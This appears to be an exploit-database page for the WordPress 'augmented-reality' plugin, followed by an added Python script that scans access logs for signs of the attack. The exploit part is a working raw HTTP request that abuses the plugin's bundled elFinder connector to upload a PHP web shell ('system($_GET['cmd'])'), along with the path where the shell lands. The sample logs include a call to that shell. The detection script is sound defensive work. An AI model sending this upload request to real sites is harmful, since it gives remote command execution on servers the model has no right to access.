## https://sploitus.com/exploit?id=WPEX-ID:10457
```
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074
Content-Length: 737
Connection: close
Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="reqid"

1744f7298611ba
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="cmd"

upload
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="upload[]"; filename="robbie3.php"
Content-Type: application/php

<?php system($_GET['cmd']); ?>

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="mtime[]"

1597850374
-----------------------------42474892822150178483835528074--
```

The uploaded file ends up at:

/wp-content/plugins/augmented-reality/file_manager/robbie3.php
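
To check whether a site has seen this request pattern, the following added example (not part of the original PoC) scans web server access logs for a POST to the plugin's elFinder connector and for requests to script files under `file_manager/`. It assumes combined-format access logs and an assumed list of PHP-handled extensions; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and the resulting file location shown above.
PLUGIN = "/wp-content/plugins/augmented-reality/"
CONNECTOR = PLUGIN + "vendor/elfinder/php/connector.minimal.php"
UPLOAD_DIR = PLUGIN + "file_manager/"
# Extensions commonly mapped to the PHP handler (assumed list; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Combined log format: ip ident user [time] "METHOD uri PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')


def normalise(uri):
    """Drop the query string, decode percent-encoding, collapse '//' and lower-case."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()


def scan(lines):
    """Return findings as (kind, client_ip, timestamp, normalised_path) tuples."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that are not in combined log format
        ip, ts, method, uri, status = m.groups()
        path = normalise(uri)
        if method == "POST" and path == CONNECTOR:
            findings.append(("connector_post", ip, ts, path))
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            # A 2xx response means the server served (and likely executed) the script.
            kind = "script_executed" if status.startswith("2") else "script_probe"
            findings.append((kind, ip, ts, path))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE = [
    '203.0.113.7 - - [19/Aug/2020:15:19:34 +0000] "POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Aug/2020:15:19:40 +0000] "GET /wp-content/plugins/augmented-reality/file_manager/robbie3.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [19/Aug/2020:15:20:01 +0000] "GET /wp-content/plugins/augmented-reality/file_manager/model.glb HTTP/1.1" 200 90211 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Aug/2020:15:21:10 +0000] "GET /wp-content/plugins/augmented-reality//file_manager/x.PHP HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any `connector_post` from an unauthenticated client, or any `script_executed` hit, warrants checking the `file_manager/` directory on disk for files that should not be there.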